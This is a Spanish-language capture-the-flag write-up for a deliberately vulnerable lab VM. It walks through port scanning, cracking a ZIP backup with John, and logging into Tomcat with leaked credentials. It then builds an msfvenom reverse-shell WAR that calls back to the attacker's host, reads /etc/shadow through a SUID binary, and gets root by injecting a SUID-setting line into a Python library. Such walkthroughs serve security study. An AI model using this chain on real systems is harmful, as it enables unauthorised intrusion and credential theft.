Note: On this machine we have configured an internal network to Pivot to Corrosion 1
Web Enumeration
Information Leakage + Cracking ZIP File
Abusing Tomcat - Creating a malicious WAR file [RCE]
Abusing SUID Binary - Reading privileged files
Cracking Hashes
Manipulating the code of a Python library with incorrectly configured permissions [Privilege Escalation]
EXTRA: Pivoting Lab with Corrosion 1
Metodologia:
Escaneo en Nmap:
//
❯ nmap -p- -n -T5 --open 192.168.1.142
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-05 22:32 EDT
Stats: 0:00:05 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 51.76% done; ETC: 22:32 (0:00:05 remaining)
Stats: 0:00:09 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 90.67% done; ETC: 22:32 (0:00:01 remaining)
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 97.08% done; ETC: 22:32 (0:00:00 remaining)
Nmap scan report for 192.168.1.142
Host is up (0.00100s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open proxy
MAC Address: 00:0C:29:6C:73:2D (VMware)
Realizamos escaneo de Scripts y versiones:
Vemos que corre por el puerto 80:
Utilizamos Gobuster para encontrar subdominios:
No conseguimos nada, intentaremos por el puerto 8080
Conseguimos un archivo de backups y un txt, los revisamos (captura):
backup.zip.
nota txt.
El readme dice: " Hey randy! It's your System Administrator. I left you a file on the server, I'm sure nobody will find it.
Also remember to use that password I gave you."
Ahora intentaremos descomprimir el Backup, pero tiene password, asi que intentaremos crackearlo con jhontheriper:(captura)
Backuo con password.
Ya con el hash obtenido terminamos de realizar un ataque de fuerza bruta para obtener el password en texto claro:
Dentro de tomcat-users encontramos usuario y password de una dministrador en texto claro, username="manager" password="melehifokivai" roles="manager-gui" :
User y password.
Con las credenciales obtenidas intentaremos logearnos: (capturas)
Login por el puerto 8080.
Ingreso al servidor.
Hemos ingresado, ahora crearemos un archivo .war malicioso que nos pueda permitir ganar acceso total al sistema, para esto usaremos msfvenom:
Ya con el payload creado solo debemos subirlo al servidor y ponernos en escucha en el puerto que queramos:
Nos ponemos en escucha por puerto 443.
Subimos el payload .war al servidor.
Confirmamos que este subido.
damos click al payload para que se ejecute.
Lo logramos, estamos dentro, ahora busquemos las flags:
Obtuvimos la primera bandera, pero no somos root y esta maquina en particular esta creada para pivotear hacia otra, así que con un script, intentaremos tener bash dentro del sistema:
Ya tenemos la Bash completa y la flag de randy, pero el sistema no nos deja entrar a jaye, probaremos con las passwords anteriores a ver si hay reutilizacion:
Estamos dentro, en Jaye no encontramos nada tan interesante a excepcion de un binario que nos puede indicar como podemos escalar privilegios:
Con este binario podemos listar los hashes de otros usuarios ,edoamte /etc/shadow para despues crackearlos con John, usando el comando ./look:
Conseguimos el hash de Randy, lo podemos crackear con john:
Con la nueva password nos logeamos por ssh:
Entramos, Ahora el objetivo es escalar privilegios:
Nos damos cuenta que randy puede ejecutar scripts en Python, asi que podemos buscar el origen de la libreria y alterarla para ganar privilegios:
Creamos un Script nuevo para ejecutarlo y ganar privilegios aprovechandonos de la libreria de Origen:
Ejecutamos el Script:
Hemos ganado acceso ahora buscamos la siguiente flag:
Una vez hemos ganado privilegios, intentaremos pivotiar hacia Corrosion 1, para ver como lo lograremos debes irte a ese writeup, esta maquina la damos por terminada.
//
❯ zip2john backup.zip
Created directory: /root/.john
ver 2.0 efh 5455 efh 7875 backup.zip/catalina.policy PKZIP Encr: TS_chk, cmplen=2911, decmplen=13052, crc=AD0C6FDB ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/context.xml PKZIP Encr: TS_chk, cmplen=721, decmplen=1400, crc=59B9F4E7 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/catalina.properties PKZIP Encr: TS_chk, cmplen=2210, decmplen=7276, crc=1CD3C095 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/jaspic-providers.xml PKZIP Encr: TS_chk, cmplen=626, decmplen=1149, crc=748A87A6 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/jaspic-providers.xsd PKZIP Encr: TS_chk, cmplen=862, decmplen=2313, crc=3B44D150 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/logging.properties PKZIP Encr: TS_chk, cmplen=1076, decmplen=4144, crc=1D6C26F7 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/server.xml PKZIP Encr: TS_chk, cmplen=2609, decmplen=7589, crc=F91AC0C0 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/tomcat-users.xml PKZIP Encr: TS_chk, cmplen=1167, decmplen=2972, crc=BDCB08B9 ts=B0E3 cs=b0e3 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/tomcat-users.xsd PKZIP Encr: TS_chk, cmplen=858, decmplen=2558, crc=E8F588C2 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/web.xml PKZIP Encr: TS_chk, cmplen=18917, decmplen=172359, crc=B8AF6070 ts=6920 cs=6920 type=8
backup.zip:$pkzip$81108246920948f83df8e3188341e0c4ced81b85ffe507a30f1c8bb3d60d228d81ba45b3044c40d51f41082469206af6b41285729172215c7a912286e6312228c5142b6e537384c0ad6b9a6e40b2de98422e108246920d042ed9f0787c684de489fd42ddd00403556c0caaeeabff6ca78e998731732959a1a7adf108246920034f00f26675d81f70f7de491b1c645f15032c9ab52aa2c6157156996a72a9a6a138c8e610824b0e39f16689c61f4dc5fb5405d409a9c4814354c0dba919313e1903a9580daa135342c46fea31082469207046a2cc2a19fdf9e44c52bdd3b1a9d458ca7e751d2ec883c4d808c79087fb2606344d591082469206ae99725253d7986459879f818798e0fe14dd1a533635704c24831f0acbceab71f99b2842027247d748a87a617dd4e82726920502768ce9a11db8105560cdc8ea3b12cb91e5fa10d15b79fdc5335826c2f4a6e4112818ff5cce6e766548eef59eafabd29a2c2de3308487c980603b3867bb62bb60e65451a1fd9bb068ff01a4c2e98a8bbb56dd0f392338b147324bbd34ab2e63d2b80882029705f3803ead22980591ea52cab28fad58ad94838283fd7e267478f9a3e7f645f60ca4d0a227cef99c3db46184f8521dc4dd30f4102ad006dd04a7d054a9018f55730511ccd34bd15a50ebbd1012d4ba320b23fa925ede6d62e3929c137b959813290f0bf0e2a9ca075d1b6b511fb525a5289c32d29365132e25432f855f982f37e4a5fde6901e8f889218d987067920133a4b26ceecc5f3d28f40cb33601cff6f803b0eb900a183ef9e13d7e888fc9770fdb9d01ced0c6969f5df03fdce418da1d979220b430bee9dc21fa63f33b2c1f7b99f848ca5b618d0b6d6eb56ec3748595f1ca1c01492d6464fd1cf73ecd92b6bea1bccc9b8795b1d6087e9205b8e6c5122f83e3625c145b563e1763578d002e0feea455a19d74831c64f69440a3cbcb7b679f683c238984873b7a80df997f11e5d924fe98d1baef30bfce5efb613e82eab136e3844b0e326508b1dac80b2f863b35efdbfa95138d9994699da813c8bb8bc4e7c885b851db53f85d8f1d39f32dfda36477a64821ea03e444866882c6b64d446feb650780e26fab3701fd0743ac26cacefde996ccfe538776ea101c1d3aec81660613bd65eb34569139ee0845e7f7d1e8b12f8ed43ef58e9580c58ab2cfe170981c72256b4b12cc152771546d0ea9077d368c3ddc2c63819b00b3dd3581ab8908561cd8ad722c21d9a891922d8b52444f4fca9278a1a96e926cf19125ec20a327e8a3ab0aa2b05d4348*$/pkzip$::backup.zip:jaspic-providers.xml, context.xml, tomcat-users.xsd, jaspic-providers.xsd, logging.properties, tomcat-users.xml, catalina.properties, server.xml:backup.zip
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
❯ zip2john backup.zip > hash
ver 2.0 efh 5455 efh 7875 backup.zip/catalina.policy PKZIP Encr: TS_chk, cmplen=2911, decmplen=13052, crc=AD0C6FDB ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/context.xml PKZIP Encr: TS_chk, cmplen=721, decmplen=1400, crc=59B9F4E7 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/catalina.properties PKZIP Encr: TS_chk, cmplen=2210, decmplen=7276, crc=1CD3C095 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/jaspic-providers.xml PKZIP Encr: TS_chk, cmplen=626, decmplen=1149, crc=748A87A6 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/jaspic-providers.xsd PKZIP Encr: TS_chk, cmplen=862, decmplen=2313, crc=3B44D150 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/logging.properties PKZIP Encr: TS_chk, cmplen=1076, decmplen=4144, crc=1D6C26F7 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/server.xml PKZIP Encr: TS_chk, cmplen=2609, decmplen=7589, crc=F91AC0C0 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/tomcat-users.xml PKZIP Encr: TS_chk, cmplen=1167, decmplen=2972, crc=BDCB08B9 ts=B0E3 cs=b0e3 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/tomcat-users.xsd PKZIP Encr: TS_chk, cmplen=858, decmplen=2558, crc=E8F588C2 ts=6920 cs=6920 type=8
ver 2.0 efh 5455 efh 7875 backup.zip/web.xml PKZIP Encr: TS_chk, cmplen=18917, decmplen=172359, crc=B8AF6070 ts=6920 cs=6920 type=8
NOTE: It is assumed that all files in each archive have the same password.
If that is not the case, the hash may be uncrackable. To avoid this, use
option -o to pick a file at a time.
❯ cat hash
───────┬────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
│ File: hash
───────┼────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
1 backup.zip:$pkzip$81108246920948f83df8e3188341e0c4ced81b85ffe507a30f1c8bb3d60d228d81ba45b3044c40d51f4108246
9206af6b41285729172215c7a912286e6312228c5142b6e537384c0ad6b9a6e40b2de98422e108246920d042ed9f0787c684de489fd42ddd
00403556c0caaeeabff6ca78e998731732959a1a7adf108246920034f00f26675d81f70f7de491b1c645f15032c9ab52aa2c6157156996a72
a9a6a138c8e610824b0e39f16689c61f4dc5fb5405d409a9c4814354c0dba919313e1903a9580daa135342c46fea31082469207046a
2cc2a19fdf9e44c52bdd3b1a9d458ca7e751d2ec883c4d808c79087fb2606344d591082469206ae99725253d7986459879f818798e0fe14dd
│ 1a533635704c24831f0acbceab71f99b2842027247d748a87a617dd4e82726920502768ce9a11db8105560cdc8ea3b12cb91e5fa10d1
│ 5b79fdc5335826c2f4a6e4112818ff5cce6e766548eef59eafabd29a2c2de3308487c980603b3867bb62bb60e65451a1fd9bb068ff01a4c2e98a8bb
│ b56dd0f392338b147324bbd34ab2e63d2b80882029705f3803ead22980591ea52cab28fad58ad94838283fd7e267478f9a3e7f645f60ca4d0a227ce
│ f99c3db46184f8521dc4dd30f4102ad006dd04a7d054a9018f55730511ccd34bd15a50ebbd1012d4ba320b23fa925ede6d62e3929c137b959813290
│ f0bf0e2a9ca075d1b6b511fb525a5289c32d29365132e25432f855f982f37e4a5fde6901e8f889218d987067920133a4b26ceecc5f3d28f40cb3360
│ 1cff6f803b0eb900a183ef9e13d7e888fc9770fdb9d01ced0c6969f5df03fdce418da1d979220b430bee9dc21fa63f33b2c1f7b99f848ca5b618d0b
│ 6d6eb56ec3748595f1ca1c01492d6464fd1cf73ecd92b6bea1bccc9b8795b1d6087e9205b8e6c5122f83e3625c145b563e1763578d002e0feea455a
│ 19d74831c64f69440a3cbcb7b679f683c238984873b7a80df997f11e5d924fe98d1baef30bfce5efb613e82eab136e3844b0e326508b1dac80b2f86
│ 3b35efdbfa95138d9994699da813c8bb8bc4e7c885b851db53f85d8f1d39f32dfda36477a64821ea03e444866882c6b64d446feb650780e26fab370
│ 1fd0743ac26cacefde996ccfe538776ea101c1d3aec81660613bd65eb34569139ee0845e7f7d1e8b12f8ed43ef58e9580c58ab2cfe170981c72256b
│ 4b12cc152771546d0ea9077d368c3ddc2c63819b00b3dd3581ab8908561cd8ad722c21d9a891922d8b52444f4fca9278a1a96e926cf19125ec20a32
│ 7e8a3ab0aa2b05d4348*$/pkzip$::backup.zip:jaspic-providers.xml, context.xml, tomcat-users.xsd, jaspic-providers.xsd, log
│ ging.properties, tomcat-users.xml, catalina.properties, server.xml:backup.zip
//
❯ john --wordlist=/usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
@administrator_hi5 (backup.zip)
1g 0:00:00:05 DONE (2025-05-05 23:48) 0.1949g/s 2240Kp/s 2240Kc/s 2240KC/s @lexus1s..<3missrusby<3
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
Conseguimos la password, @administrator_hi5, ahora intentaremos descomprimir el backup.zip:
❯ unzip backup.zip
Archive: backup.zip
[backup.zip] catalina.policy password:
inflating: catalina.policy
inflating: context.xml
inflating: catalina.properties
inflating: jaspic-providers.xml
inflating: jaspic-providers.xsd
inflating: logging.properties
inflating: server.xml
inflating: tomcat-users.xml
inflating: tomcat-users.xsd
inflating: web.xml
❯ ls
backup.zip context.xml jaspic-providers.xsd tomcat-users.xml
catalina.policy hash logging.properties tomcat-users.xsd
catalina.properties jaspic-providers.xml server.xml web.xml
❯ cat tomcat-users.xml
//
❯ msfvenom -p java/shell_reverse_tcp LHOSTS:192.168.1.136 LPORT:443 -f war -o reverse.war
Payload size: 13033 bytes
Final size of war file: 13033 bytes
Saved as: reverse.war
❯ ls
reverse.war
//
whoami
tomcat
cd /
ls
bin
boot
cdrom
dev
etc
home
lib
lib32
lib64
libx32
lost+found
media
mnt
opt
proc
root
run
sbin
snap
srv
swapfile
sys
tmp
usr
var
cd home
ls
jaye
randy
cd randy
ls
Desktop
Documents
Downloads
Music
note.txt
Pictures
Public
randombase64.py
Templates
user.txt
Videos
cat user.txt
ca73a018ae6908a7d0ea5d1c269ba4b6
//
script /dev/null -c bash
ctrl + z
stty raw -echo;fg
reset xterm
tomcat@corrosion:/home/randy$
//
tomcat@corrosion:/home/randy$ su jaye
Password:
$ bash
//
jaye@corrosion:~$ ls
Desktop Downloads Music Public Templates
Documents Files Pictures snap Videos
jaye@corrosion:~$ cd Files
jaye@corrosion:~/Files$ ls
look
//
ssh randy@192.168.1.142
The authenticity of host '192.168.1.142 (192.168.1.142)' can't be established.
ED25519 key fingerprint is SHA256:zKtKAXyhL0euYM1nLav6ZWVRGZ4c2NxUZ+mMIU3VImg.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.1.142' (ED25519) to the list of known hosts.
randy@192.168.1.142's password:
//
randy@corrosion:~$ ls - l
total 44
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Desktop
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Documents
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Downloads
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Music
-rw-r--r-- 1 root root 283 Sep 20 2021 note.txt
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Pictures
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Public
-rwxr-xr-x 1 root root 210 Sep 20 2021 randombase64.py
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Templates
-rw-rw-r-- 1 randy randy 33 Sep 17 2021 user.txt
drwxr-xr-x 2 randy randy 4096 Sep 16 2021 Videos
//
Modified 22-May-2007 by Guido van Rossum to use bytes everywhere Modified
import re
import struct
import binascii
import os
os.system("chmod u+s /bin/bash") (agregamos esta linea para obtener bash root)
all_ = [
# Legacy interface exports traditional RFC 2045 Base64 encodings
^G G'encode', 'decode', 'encodebytes', 'decodebytes',J Justify ^C Cur P^X # Generalized interface for other encodings Text^T To Spell ^_ Go To Li 'b85encode', 'b85decode', 'a85encode', 'a85decode',
# Standard Base64 encoding
'standard_b64encode', 'standard_b64decode',
//
randy@corrosion:/$ sudo /usr/bin/python3.8 /home/randy/randombase64.py
Enter your string: hacked (colocamos cualquier string)
aGFja2Vk
randy@corrosion:/$ whoami
randy
randy@corrosion:/$ bash -p (ejeuctamos bash con privilegios)
bash-5.0# whoami
root
//
bash-5.0# cd /root
bash-5.0# ls
root.txt snap
bash-5.0# cat root.txt
2fdbf8d4f894292361d6c72c8e833a4b
